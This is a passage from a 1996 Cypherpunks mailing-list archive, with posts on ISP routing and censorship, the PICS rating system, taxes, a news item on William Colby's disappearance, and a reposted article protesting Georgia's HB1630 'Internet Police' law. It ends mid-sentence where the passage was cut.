Date: Tue, 7 May 1996 12:49:02 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.rutgers.edu>
Subject: Re: PICS required by laws
In-Reply-To: <01I4A37X6Y0W8Y56P8@mbcl.rutgers.edu>
Message-ID: <199605061824.OAA10053@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


"E. ALLEN SMITH" writes:
>	I am not quite certain if the model of
>[content provider]-[ISP]-[Phones]-[ISP]-[ISP]-[user] is going to work much
>longer. That routes the material through quite a few too many bottlenecks,
>among them the phone lines. I could reasonably easily sign up with two ISPs
>and start myself as a router (with a good computer and the right software),
>from what I know of the subject; with ecash routing of messages, this might
>get quite common (and profitable).
>	When you've got a few large organizations doing the routing, what
>you've said is _probably_ correct. When you've got a lot of people doing it
>out of their garages, then it isn't.
>	-Allen

The problem is that it requires the cooperation of both of your ISPs.
You'll never receive packets to route from either of them unless you
have some sort of contract in place.  In the scenario I outlined, the
"common carrier" status of the ISPs is contingent on their following
the censorship protocol, so their contract will require that you, too,
follow it.

The network layer isn't the geodesic Bob H likes to talk about.  That
doesn't happen until the transport layer (one higher).  It's a
heirarchical star, with a relatively small number of big ISPs acting as
the hub, several groups of regional ISPs acting as local arms, and many
local ISPs acting as the end-points.

Even in the face of a "digital silk road", this isn't likely to
change.  The cost of operating a router is proportional to the number
of connections it has.  The vast majority of traffic doesn't have
stringent enough delay requirements that it'll be willing to pay the
additional cost of going through a very highly connected router.
Therefore the hierarchical star configuration is near-optimal for
normal traffic (and pretty much all of the stuff that they claim they
want to censor).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 7 May 1996 10:11:50 +0800
To: s1113645@tesla.cc.uottawa.ca
Subject: Re: CryptoAnarchy: What's wrong with this picture?
Message-ID: <01I4DYBJO0NA8Y583T@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"s1113645@tesla.cc.uottawa.ca" 29-APR-1996 02:04:15.24
To:	IN%"EALLENSMITH@mbcl.rutgers.edu"  "E. ALLEN SMITH"
CC:	IN%"cypherpunks@toad.com"
Subj:	RE: CryptoAnarchy: What's wrong with this picture?

Received: from tesla.cc.uottawa.ca by mbcl.rutgers.edu (PMDF #12194) id
 <01I43C5TODPC8WWL2O@mbcl.rutgers.edu>; Sun, 28 Apr 1996 23:12 EDT
Received: by tesla.cc.uottawa.ca (AIX 3.2/UCB 5.64/4.03) id AA25041; Sun,
 28 Apr 1996 23:17:36 -0400
Date: Sun, 28 Apr 1996 23:17:36 -0400 (EDT)
From: s1113645@tesla.cc.uottawa.ca
Subject: RE: CryptoAnarchy: What's wrong with this picture?
In-reply-to: <01I43B16HT2U8Y53CU@mbcl.rutgers.edu>
Sender: s1113645@tesla.cc.uottawa.ca
To: "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu>
Cc: cypherpunks@toad.com
Reply-to: s1113645@tesla.cc.uottawa.ca
Message-id: <Pine.3.89.9604282225.B28833-0100000@tesla.cc.uottawa.ca>
X-Envelope-to: EALLENSMITH
Content-type: TEXT/PLAIN; CHARSET=US-ASCII
Mime-Version: 1.0



On Sun, 28 Apr 1996, E. ALLEN SMITH wrote:

>> 	Currently, yes... but the divide between rich and poor is growing.
>> (So long as this divide is determined by merit, and the poor still have
>> enough to survive, I'd call this a good trend. So would various other
>> people on this list, perhaps without my caveats.) In other words, the
>> middle class is going

>I agree with your caveat. It's where the anarchists get me skeptical.

	The poor still having enough to survive is the most significant
reason I'm not an anarcho-capitalist. There are a few others, but that's the
main one.

>Someone sent me some US income tax figures. It would seem that the vast
>majority of personal taxes are paid by the rich and high-end upper-middle.
>So I'll eat my words and agree with you, talking about the rich makes
>quite a bit of sense. I sort of do wonder how many of those "corporations"
>are small businesses and individuals working as companies. Time for me to
>go find a national stats book. 

	Despite its agreeing with my point (thank you), I'm not sure if I'd
consider income taxes to be enough of the story to go by them alone. Federal
level, yes; state & local, probably not. I am willing to bet that property
taxes are mainly paid by the relatively wealthy, given how much of personal
capital tends to get tied up in a home. Sales taxes are more evenly
distributed.
	However, the economic changes I discuss should result in this becoming
true, even if it might not be completely true currently.

>Of course only talking about the rich makes things so much easier.

	Yes. In a capitalist society based on merit, the rich are the ones
who matter in the long run.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 7 May 1996 13:17:52 +0800
To: cypherpunks@toad.com
Subject: PICS: cyberratings, not censorship
Message-ID: <199605062039.NAA20150@netcom2.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



some more information on PICS for the interested.

I am a strong advocate of this system because even though it involves
ratings, I see it as expressly and vehemently 
anti-censorship. this will be difficult
to understand for some people who equate ratings 
with censorship, and it will require
some major education to help people see why this is not the case
with PICS (platform independent content selection).

why is PICS *not* censorship? because of its key design goals:

1) people are free to choose what ratings they use.  whoever
  sets up the system decides. i.e. parents might pick a particular
  rating agency for their family. people might even use a combination
  of ratings. i.e. weigh the Christian Zealots 50%, and the
  People for the Improvement of Cyberspace 50%, etc

2) ratings are not merely for blacking out pages. they can be
   for finding "neat" pages (Point Communications 5%, etc),
   or "child friendly" or whatever

3) ratings can be created by anyone, including gov't agencies,
  individuals, foreign governments, religious fanatics,
  etc., and moreover they can be in any form whatsoever, they
  are merely seen as information-- the market will decide 
  which ones are useful and which ones are worthless, 
  and whether to create standards in various specific categories.


regarding the CyberAngels, I think it would be an excellent project
to have them while away their lifetimes going through the web
and applying their official "cyberangel rating" to every page they
encounter. it would be a valuable public service, and they'd probably
get a real kick out of it (hmmm, perhaps "control-freak-ecstasy"?). 
it gives them a chance to put their brains and hands where their 
mouths are, so to speak.

next time you hear someone rant about pornography in cyberspace,
or censorship, or whatever, (whether it is Gore's wife or some 
nobody on an obscure mailing list), tell them to set up their own 
PICS rating service and shut up.

if you hear someone whine that no one is listening to their
rating service or using their ratings, tell them that it's
an excellent existence proof that no one truly cares what they think,
and for them to jam it down anyone's throat (via legislation
or whatever) only proves how manipulative, desperate, 
and out-of-touch-with-reality they are.

truly, I hope that some day the universal and accepted response
to seeing something you don't like on the internet will be to
start or join a rating service, and NOT to try to pass a bill
in congress that attempts to regulate cyberspace (@#$%^&*).

will there ever be a day in the future in which, e.g., the Iranian
governments of the world decide to start a Moslem Cyberspace
Blacklisting Service instead of the less-efficient and less-effective
method of Lucrative Blasphemer Assassination Grants?  help support
this proposal and perhaps it will happen. <g>


------- Forwarded Message

Date: Mon, 06 May 1996 10:54:56 -0400
To: pics-info@...
From: Paul Resnick <presnick@research.att.com>
Subject: vac-wg Announcing PICS 1.1!


Version 1.1 of the PICS technical specifications are now available from the
PICS web page (http://w3.org/PICS). The direct URLs for the two documents are:

http://www.w3.org/pub/WWW/PICS/services.html
http://www.w3.org/pub/WWW/PICS/labels.html

We plan to submit them as informational RFCs in the near future.

These documents are now frozen. If significant new features are specified in
the future, there will be a higher version number.

Three cheers!
- ------------------------------------------------------------
Paul Resnick			AT&T Research
Public Policy Research		Room 2C-430B
908-582-5370 (voice)		600 Mountain Avenue
908-582-4113 (fax)		P.O. Box 636
				Murray Hill, NJ 07974-0636








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jon Leonard" <jleonard@divcom.umop-ap.com>
Date: Tue, 7 May 1996 13:56:13 +0800
To: cypherpunks@toad.com
Subject: Re: Why I Pay Too Much in Taxes
In-Reply-To: <199605061419.HAA02540@dns2.noc.best.net>
Message-ID: <9605062040.AA18344@divcom.umop-ap.com>
MIME-Version: 1.0
Content-Type: text



James A. Donald wrote:
> At 11:16 PM 5/5/96 -0700, Sandy Sandfort wrote:
> >On Sun, 5 May 1996, Alan Horowitz wrote:
> >> didn't the feudal vassels only pay 33% ?
> >
> >Actually, no.  When I used to edit a magazine, I commissioned an
> >article about how much "tax" slaves, serfs, etc. paid.  That is,
> >how much of what they produced, did they get to keep; how much
> >went to their masters.  The surprising, cross-cultural answer my
> >researcher/writer found was that they got to keep everthing they
> >produced except 5-10%.  That's a lot better, percentage-wise,
> >than for modern "tax slaves."
> 
> In the early feudal period, ordinary knights did not live well.  
> They were only moderately better off than peasants, and yet to support one 
> knight, you needed a startlingly large number of peasants, a fact
> that kings were continually unhappy about and continually trying
> to fix.
> 
> While it is difficult to assess the tax rate, because taxes were
> in kind, it was clearly very low by modern standards.

Things are sufficiently different that such a comparison might not be
meaningful anyway.  For example, subtracting subsistence level food, and then
figuring tax rates would give a different answer. 

The amount of work it takes to provide basic needs now is clearly
very low by historical standards.  Government is big by historical standards.
I'll object to only one of those.

Jon Leonard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 7 May 1996 09:44:12 +0800
To: unicorn@schloss.li
Subject: Re: Nando.net on expatriate tax issue
Message-ID: <01I4DYJWM3NG8Y583T@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"unicorn@schloss.li"  "Black Unicorn" 29-APR-1996 02:16:40.69

>On Sun, 28 Apr 1996, E. ALLEN SMITH wrote:

> >Billionaires' tax loophole could complicate passage of health reform

>What precisely does this reporter think is being "tightened" in his or her
>version of the House bill?  (Note that in current law there is no $500,000
>floor).  In fact the reporter hasn't bothered to describe what the
>provision really does.  (Imposes a expatriation is taxable event
>analysis).  Talk about a snow job.  I won't say it is or is not advertant,
>but it's bloody annoying.

	Fascinating. One wonders how the House managed to convince the
CBO that it would gain money... it did.

> >The House version would be extremely difficult to enforce and would allow
> >patient expatriates to avoid the tax by holding their assets for 10 years
> >before selling, they say. In the interim, they could raise cash by
> >borrowing against the assets.

>Which is the law today.  What is with this guy?  Get your facts straight
>media.

	I have relatives who went to journalism school during the Depression.
I begin to see why they complain about modern media, and why Heinlein said
that Time _never_ got the story right on anything he saw in person. Modern
journalism schools are going more and more to communication theory courses
as opposed to how to write and how to get the facts straight.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 7 May 1996 10:45:00 +0800
To: unicorn@schloss.li
Subject: Re: CryptoAnarchy: What's wrong with this picture?
Message-ID: <01I4DYNHXPW28Y583T@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"unicorn@schloss.li"  "Black Unicorn" 29-APR-1996 02:21:27.65
To:	IN%"jimbell@pacifier.com"  "jim bell"
CC:	IN%"cypherpunks@toad.com"  "Cypherpunks"
Subj:	RE: CryptoAnarchy: What's wrong with this picture?

Received: from toad.com by mbcl.rutgers.edu (PMDF #12194) id
 <01I43INDKHI88WWLV8@mbcl.rutgers.edu>; Mon, 29 Apr 1996 02:18 EDT
Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id TAA27441 for
 cypherpunks-outgoing; Sun, 28 Apr 1996 19:17:23 -0700 (PDT)
Received: from polaris.mindport.net (unicorn@polaris.mindport.net
 [205.219.167.2]) by toad.com (8.7.5/8.7.3) with SMTP id TAA27428 for
 <cypherpunks@toad.com>; Sun, 28 Apr 1996 19:17:12 -0700 (PDT)
Received: from localhost (unicorn@localhost) by polaris.mindport.net
 (8.6.12/8.6.12) with SMTP id AAA07591; Mon, 29 Apr 1996 00:15:56 -0400
Date: Mon, 29 Apr 1996 00:15:56 -0400 (EDT)
From: Black Unicorn <unicorn@schloss.li>
Subject: RE: CryptoAnarchy: What's wrong with this picture?
In-reply-to: <m0uDagf-00093GC@pacifier.com>
Sender: owner-cypherpunks@toad.com
To: jim bell <jimbell@pacifier.com>
Cc: Cypherpunks <cypherpunks@toad.com>
Reply-to: Black Unicorn <unicorn@schloss.li>
Message-id: <Pine.SUN.3.93.960428234342.5923A-100000@polaris.mindport.net>
X-Envelope-to: eallensmith
Content-type: TEXT/PLAIN; charset=US-ASCII
Posted-Date: Mon, 29 Apr 1996 00:15:56 -0400
X-Sender: unicorn@polaris.mindport.net
MIME-Version: 1.0
Precedence: bulk

On Sun, 28 Apr 1996, jim bell wrote:

[...]

>While strong cryptography is powerful, and secure communications
>liberating, unplugging the phones would about cripple that 'weapon' for a
>while.  Any group rebelling based only on high technology communication is
>an extremely vulnerable group, both to widespread denial of service, and
>more specific 'surgical' attacks.  (Motorola stock anyone?)

	Wouldn't that partially depend on:
		A. the level of backups - packet radio as a backup for phones,
for instance... a reason I've been forwarding the stuff on radio to here.
		B. the necessity to the government of keeping what else may
depend on those phones - the economy - going.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 7 May 1996 14:23:46 +0800
To: "E. ALLEN SMITH" <cypherpunks@toad.com
Subject: Re: Internet telephony report
Message-ID: <199605062043.NAA24796@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:58 PM 5/6/96 -0400, E. ALLEN SMITH wrote:
>        While they _probably_ aren't going to start trying to charge for
>Internet phone service, the FCC still thinks it should be able to regulate
>the Internet - with the egalitarian excuse of equal access as among the
>reasons. Hmph... bureaucracy.

Well, now we know where they are going to levy the taxes when most commerce
goes on the net.  They'll hit up the guys with lots of cable/fiber etc. 
:-)


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer@c2.org
Date: Tue, 7 May 1996 14:26:32 +0800
To: shamrock@netcom.com (Lucky Green)
Subject: Re: WWW proxies?
In-Reply-To: <v02120d01adb3f9eac27a@[192.0.2.1]>
Message-ID: <199605062058.NAA00289@clotho.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> In your evaluation, perhaps. In the mind of every web proxy site? Doubtful.
> 
> In fact, a former client of mine seriously considered offering an
> "anonymous" web proxy for the sole reason to be able to capture the traffic
> stats.

	I will crush other such sites.

-sameer, who will take over the world.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 7 May 1996 10:49:33 +0800
To: John Young <jya@pipeline.com>
Subject: Re: ATF_ear
In-Reply-To: <199605061549.PAA06105@pipe1.t2.usa.pipeline.com>
Message-ID: <Pine.SUN.3.93.960506140049.23150R-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


>    ATF_ear
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: reagle@rpcp.mit.edu (Joseph M. Reagle Jr.)
Date: Tue, 7 May 1996 12:20:01 +0800
To: cypherpunks@toad.com
Subject: Police report body found during Colby search
Message-ID: <9605061902.AA08036@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



  	  				 
	 WASHINGTON (Reuter) - A body was found Monday in the area  
where former CIA Director William Colby went missing after going 
canoeing on April 27, Maryland Department of Natural Resources 
police said. 
	 There was no immediate confirmation that the body was that  
of Colby, a spokeswoman said. ``Yes, a body was found,'' she 
said. The search had been under way in the area of Colby's 
weekend home at Cobb Neck in southern Maryland on a tributary of 
the Potomac River. 
	 Colby, who served as director of the CIA in the 1970s, was  
reported missing after his swamped canoe was found and he had 
not returned to his home. 
	 A CNN producer reported that a male body was found washed up  
on the shore of the Wicomico River about 20 yards from where the 
canoe was found. 
	 While there was no immediate identification of the body, CNN  
said ``officials have confirmed it was a male body and they say 
everything fits -- it looks like Colby.'' 
	 His disappearance had touched off an air and water search  
that included divers and specially trained dogs but the probe 
turned up no sign of a body in the cold, murky waters. 
  	   	




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: reagle@rpcp.mit.edu (Joseph M. Reagle Jr.)
Date: Tue, 7 May 1996 14:19:10 +0800
To: law@rpcp.mit.edu
Subject: Georgia Internet
Message-ID: <9605061903.AA08069@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain





X-within-URL: http://www.clark.net/pub/rothman/ga.htm                           


   [IMAGE] 
   
      Needed: a first-rate lawyer who'll fight the Internet Police law in
      court. Click below on the "How We Can Educate" link for more info on
      constructive actions. 
      
      Return to NetWorld! Book | Other Musing on Intellectual Property
      How We Can Educate Pols, Olympic Boosters and Other Georgians | Links of
      Interest
      Contest: Write the Best "Night the Lights Went Out in Georgia" Parody
      
      The Internet Police Law: The Day the Sites Went Out in Georgia?
      
     David H. Rothman | rothman@clark.net
     
     Linking your Web site to anyone else's without permission? Be glad
     you're not in Georgia--or be worried if you are.
     
     Gov. Zell Miller on the morning of April 18 signed into a law a
     piece of imbecility that the Marietta Daily Journal had dubbed the
     Internet Police bill.
     
     House Bill 1630 may prevent Webfolk from linking from their
     homepages against the wishes of the linkees--at least if the other
     guys' names or logos are used.
     
     Is 1630 a belated April Fool's joke? I've heard of Net-dumb pols,
     but Georgia has out-Exoned Exon--and maybe even out-Doled Dole.
     Shari Steele, an attorney with the Electronic Frontier Foundation,
     wrote Gov. Miller before the signing: "The language of the bill
     would make it illegal to create a button on our web site with
     Wired's 'trade name' or 'logo' without first obtaining 'permission
     or authorization' from Wired magazine." Whoops: oh, please,
     Wired--don't sue me. Actually that would be the state's job; you
     see, the law would let Georgia throw your posterior in jail for up
     to a year.
     
     Live out of state? As of this writing it was unclear how much of a
     danger extradition would pose--maybe none, given the lunacy of the
     law. Then again, there are rumors that California and other states
     may replicate Georgia's stupidity.
     
     The morning the Guv signed the bill, I dropped by the State of
     Georgia Home Page. Under "Search Engines and other Web Services" I
     saw a link to Yahoo. I'm glad the Georgia folks can use Yahoo from
     down there, rather than having to start their own. Imagine Yahoo
     needing permission for every link with a trademarked name. And what
     about a page displaying the results of a Lycos search? Now that
     would be fun. Can you imagine the Lycos computer e-mailing every
     site brought up--asking permission--before it listed Web addresses?
     
     I visited Zell Miller's Web area. Without the least irony, a
     headline read: "Governor Miller's Technology Initiatives Thrive."
     The page bragged about computers in classrooms. Just don't let the
     little brats grow up to start Yahoo Kudzu.
     
     According to the EFF, the same law might make it illegal even to
     mention a company's name on the Web without permission. True? Just
     imagine what this could mean to an online newspaper reviewing
     another publication's Web site. Already a software company outside
     Georgia has used existing intellectual property law to bully a
     reviewer. I've said it once, and I'll say it again: The media are
     damned fools if they support intellectual property zealotry of the
     kind we've seen out of Capitol Hill recently. Goodbye, First
     Amendment. These are national issues, alas, not just problems with
     the Georgia drinking water.
     
     If nothing else, I suspect that the good folks at the AT&T
     Business Network--the ones who run LeadStory.com, a collection of
     the day's hottest stories from online newspapers--may have some
     thoughts on the Georgia bill. To add to the fun, when I dropped by
     Cox Newspapers' big Web site for the Atlanta Journal-Constitution, I
     saw a "Surf Less. Know More" ad from LeadStory.com.
     
     At the Atlanta site's Net News I just happened to read a report on
     a trademark infringement suit that BellSouth had filed against the
     an Internet directory called the Real InterNet Pages. Hmmm. Any
     connections here with the new law? And simply because BellSouth's
     print directories use the trademarked phrase "The Real Yellow
     Pages," is the company entitled to www.realpages.com--the smaller
     company's existing Web address? The Real InterNet Pages, after
     all, isn't saying, "www.realyellowpages.com." In any event one would
     hardly confuse the Real InterNet Pages with BellSouth; the pigmy
     tells visitors to its home page: "Not Affiliated, Associated or
     Connected with BellSouth or any BellSouth-related company."
     
     Coincidentally or not, the Internet Police bill was introduced by
     Don Parsons, a Net-innocent employee of BellSouth. According to the
     Conservative Policy Caucus in the Georgia House: "During floor
     debate, Rep. Parsons could not explain the concept of a link on a
     home page. It was clear to many that he had no idea of what the
     Internet was all about. Supposedly, his desire was to prevent
     'misrepresentation' on the Internet. Parsons admitted that he had
     never been on the Internet, except looking over a colleague's
     shoulder at work." One can understand, then, why many Netfolks
     wonder if Parsons' employer has encouraged him to squelch
     competition at a time when the Baby Bells envision a Web full of
     Yellow Pages. Bell South vehemently denies a connection between it
     and the Parsons bill. Whatever the case, however, the legislation
     would help the Parsons' employer.
     
     Oh, I've read Parsons' stated reasons for his law. But in guarding
     against fraud and protecting intellectual property rights, do we
     really want to toss out the First Amendment? Jeff Kuester, a Net-hip
     attorney of intellectual property in Atlanta, says: "We should
     certainly strive for effective protection of intellectual property
     on the Web, but not by destroying this crucial part of the
     information superhighway. These links let people move seamlessly
     from Web site to Web site. They're as crucial to the Web as bridges
     are to our nation's system of concrete-and-asphalt roads. If nothing
     else, we should avoid denying Netizens the free speech guaranteed
     outside cyberspace." While Parsons has denied that his law would
     make unauthorized links illegal, its wording would suggest
     otherwise.
     
     Criticizing Parsons' work, the Conservative Policy Caucus quotes
     the essence of HB1630 as it could affect links, and I'll pass on a
     rough extract with some tweaks of my own for the sake of clarity and
     precision: "It shall be unlawful for any person...knowingly to
     transmit any data through a computer network...if such data uses any
     individual name, trade name, registered trademark, logo, legal or
     official seal or copyrighted symbol to falsely state or imply that
     such person...has permission or is legally authorized to use such
     trade name, registered trademark..."
     
     Granted, some might say that you could assume implied consent if
     any material is up on an open medium like the Web and you want to
     link to it with appropriate identification by name. But the law is
     still a big threat, given the new legal liabilities it creates for
     journalists, publishers, activists and many others. Suppose your
     story online won't read like a puff piece. Will you need your
     target's goodwill before you can link to the site of a polluter or
     other recipient of negative publicity? And what about linking
     privately? Suppose you're on a local area network in the newsroom
     and want to share information with colleagues by way of an internal
     Web page. Will you require at least your target's tacit consent
     before you can do so? Exactly what does HB1630 mean by "a computer
     network," just the external variety? Not in my extract above was
     this additional language: "for the purpose of setting up,
     maintaining, operating, or exchanging data with an electronic
     mailbox, home page, or any other electronic information storage bank
     or point of access to electronic information." Sounds as if the
     Internet Police law won't delight the Society for Professional
     Journalists, Investigative Reporters and Editors or the Reporter's
     Committee for Freedom of the Press.
     
     Bill 1630 also contains other goodies, according to the valuable
     April 17 issue of EFFector Online and the EFF's Steele. For example,
     Ms. Steele says the bill could criminalize the use of pseudonyms;
     I'd suspect that's of interest to, say, American Online or to
     safety-minded parents who want their children to log on with fake
     names. Besides, just what's a "false" name? Ms. Steele writes of
     someone with the user name of "elvis" and says: "Even my own user
     ID, which is ssteele, does not clearly distinguish me from others
     with the last name of Steele and the first initial 'S.'"
     
     I myself am another good example of the identity issues that
     arise on a global computer network. My publisher insisted on calling
     my book NetWorld!, and it was logical for me to set up a NetWorld!
     Web site but guess what? If you do an Alta Vista search, you'll also
     find thousands of "NetWorld" mentions from unrelated "NetWorld"
     sites and the rest of the Web. Among the others are Peter's Networld
     from Peter Heneback, a Swedish foreign exchange student at West
     Anchorage High School in Alaska; NETWorld Market Place; NetWorld
     Publishing; NetWorld Systems; Networld +Interop, which, yes, has
     been known to hold expos down in Atlanta; and NetWorld Limited, a
     Hong Kong consulting company.
     
     And I'm to worry about other "NetWorlds" and "Networlds" from
     Alaska to Atlanta and Asia?
     
     While trademark law has its place, we need to allow for reasonable
     interpretations. I asked Prima Publishing to consult an attorney
     before it used NetWorld! on pulped wood. No problem, I heard. But
     what happens to my book's online version if I'm in Georgia and
     trademark fanatics prevail in court?
     
     There and elsewhere, politicians keep babbling that they'll get
     government off our backs. What bilge. If Georgia politicans respect
     citizens' rights, why is the high-tech community talking of a
     lawsuit against the Internet Police law? Alas, the Georgia state
     legislature won't meet again until next year, but meanwhile Zell
     Miller might speak out against his baby before it frightens away
     millions of dollars of high-tech business. Perhaps he can at least
     promise to ask his attorney general not to enforce the Internet
     Police law. As long as the law is still alive, I myself will do
     everything I can to warn Netfolks that Georgia is a risky place for
     them to do business right now.
     
     Meanwhile, I suspect that the Internet Police law will be like Jim
     Exon's Communications Decency Act. Many people will just ignore it,
     furthering breaking down the respect of Generation Net for
     politicians and bureaucrats in general.
     
      Return to Top of Page [IMAGE]
      
HOW TO PROTEST THE SILLINESS

     
       _______________________________________________________________
     
     
     
     The Internet Police bill--effective July 1, 1996--passed at least
     partly because politicians kowtowed to Big Bucks. Tell them they
     were wrong, that the bill will cost Georgia, that it's about as
     good for the state as Sherman's March was, that you'll tell your
     high-tech employer to stay the hell out of Georgia to avoid
     net.stupid regulations, that you'll think twice about attending the
     Olympics or buying goods that carry the Olympic logo.
     
     Let Georgia pols know that most Web sites thrive because of the
     ease of linking, not in spite of it. Time Magazine has zillions of
     links all over the Net. And without bureaucratic intervention,
     Netfolks already enjoy a wealth of phone- and Net-directories such
     as Yahoo's.
     
     Tell the Georgians that the Internet Police bill is a creature of
     special interests such as phone companies and, yes, politicians
     trying to crimp uppity rivals, including those in the Conservative
     Caucus. Some establishmentarians hated the idea of the
     conservatives' using the official Georgia seal on their Web site.
     This issue transcends ideology--my own politics are progressive.
     
     Protesting, you should avoid obscenity. Be angry in a rational and
     responsible way. Don't justify the anti-Net stereotypes that
     technophobes love.
     
     Georgia contacts
     
     [IMAGE] Gov. Zell Miller. I'd include an email address for Gov.
     Miller, but I couldn't find one--maybe I'm looking in the wrong
     locations on the Web, or perhaps in the wrong universe. His office
     phone number is 404-656-1776. Fax: 404-656-5948. Snail: Governor
     Zell Miller, State Capitol, Atlanta, Georgia 30334. It's just as
     well, actually, that you not use electronic mail since I doubt
     that the governor's office is that Net Aware. Otherwise why the Exon
     would he have signed this turkey?
     
     [IMAGE] Conservative Policy Caucus of the Georgia House of
     Representatives. You can email Georgia Representative Mitchell Kaye,
     the Webmaster, at webmaster@gahouse.com. Click here for Kaye's
     report on Parsons and the anti-Net law. Arm the Caucus with letters
     it can use to fight this atrocity. What the Net needs now, says
     Representative Kaye, is a court injunction against enforcement of
     the law. Anyone know a first-rate lawyer willing to work pro bono
     and make a name for himself or herself? If so, e-mail or phone
     Mitchell Kaye (770-998-2399), the legislator who so far has spent
     the most time and energy fighting the Internet Police law. Perhaps
     this case could be a natural for a group such as the American Civil
     Liberties Union or the Interactive Services Assocation, whose
     members include American Online, CompuServe and Prodigy, among
     others. One legislator has talked of corrective legislation, but
     according to Kaye's current thinking, a court challenge at this
     point would be more effective, since other politicians could water
     down a bill. At any rate, a bill couldn't be formally introduced
     until January 1996; and, says, Kaye, a court case could be the best
     approach. Stay tuned. Foes of the law are still sorting out their
     options as far as the best way to proceed.
     
     [IMAGE] E-mail addresses of members of the Georgia House, via the
     Conservative Policy Caucus. Remember, some of the people listed may
     be supporters of the Police Bill.
     
     [IMAGE] Names, addresses, home, office, and FAX numbers of state
     legislators. Click here and scroll down the list for contact
     information for Georgia House Speaker Thomas B. Murphy. Do not
     harass him--it'll just backfire. If you can manage, try instead to
     educate him; see if you can't save your anger for posts on the Net.
     
     [IMAGE] Don Parsons' phone number (770-728-8506) and FAX number
     (770-528-5754) and other contact info. Again, please avoid
     harassment! But do give him a piece of your mind; ideally you can
     fax Parsons, then email a cc: to Rep. Mitchell Kaye
     (mkaye@gahouse.com), a vehement critic of the Net Police law. First,
     read Don Parsons' defense of his baby. Among other things he writes
     that "Internet users - consumers, children, business people, clergy,
     etc., - have a right to expect that the Internet pages they visit
     are what they are presented to be." My response? Word on the Net
     circulates pretty quickly about frauds, and existing laws cover many
     situations. New, Internet-specific laws--against fraud or copyright
     violations--need to be much better crafted than HB1630 was. Above
     all, they must be infinitely more respectful of the First Amendment.
     
     
     [IMAGE] Georgia Attorney General Michael Bowers. His phone number is
     404-656-4585; his fax number, 404-657-8733; and his snail address
     is: Judicial Building, Atlanta, Georgia 30334.
     
     [IMAGE] State of Georgia Home Page. Poke around. Look for pressure
     points--people associated with tourism and other business. See
     below.
     
     [IMAGE] Georgia Department of Industry, Trade & Tourism, "Georgia's
     official state agency for developing new jobs and creating capital
     investment." Sign the guest book; register your company's lack of
     interest in relocating there while the Internet Police bill is in
     effect. Use the "Description of Business" field and ask that the
     Webmaster forward your opinion to policymakers.
     
     [IMAGE] Yahoo listings for 1996 Olympic Games. Use the "mailto's"
     (where you click to start writing a letter) and sign the guest books
     with protests against Georgia's medieval information policies.
     
     [IMAGE] 1996 Olympic Games Home Page. Give 'em a piece of your mind
     on the feedback page.
     
     [IMAGE] BellSouth's Olympic links. Yes, BellSouth is an official
     sponsor. So if the Olympic folks take awhile to get the point,
     you'll know why. Of course you might try complaining to BellSouth
     itself--the president is Carl E. Swearington, telephone
     770-391-2424; fax, 770-399-6355.
     
     [IMAGE] Cable News Network (CNN), whose Web site will be directly
     affected by the imbecility out of the state legislature. The
     feedback address is cnn.feedback@cnn.com. Give 'em permission to use
     your name and address on the feedback page. Oh, and while you're at
     it, you might ask CNN to forward your sentiments to Scott Woelfel,
     editor in chief of CNN Interactive. Tell him it's ok to link to
     this page, and suggest that the video part of CNN just might want to
     warn the world about the Internet Police bill.
     
     [IMAGE] E-mail, fax and snail addresses and phone numbers for the
     Georgia media--including the Atlanta papers and the Associated Press
     down there. From the Conservative Caucus.
     
     [IMAGE] Georgia Media List from Harden Political InfoSystems.
     Newspapers, magazines and broadcasters. Looks extremely
     comprehensive.
     
     [IMAGE] Thinking Right, a reader comment area of the Atlanta
     Journal. Speak up! Let Atlanta know that Georgia's on your mind!
     The "Piney Pete Sez" column of April 20 says of the Internet Police
     bill: "What prompted this action was not widespread abuse. It was
     one little gadfly, Rep. Mitchell Kaye, who's been using the great
     seal of Georgia on his conservative Website. Needless to say, Kaye
     is a Republican and consequently shut out of any highway largess,
     concrete or electronic."
     
      Return to Top of Page
      
      [IMAGE]
      
MORE LINKS

     
       _______________________________________________________________
     
     
     
     [IMAGE] Full text of the Internet Police bill.
     
     
     
     [IMAGE] Electronic Frontier Foundation.
     
     [IMAGE] April 17 EFF newsletter with details on the Internet Police
     bill.
     
     [IMAGE] Bell South Denies Lobbying for the Police Law. Rep. Don
     Parsons, sponsor of House Bill 1630, works for BellSouth; but the
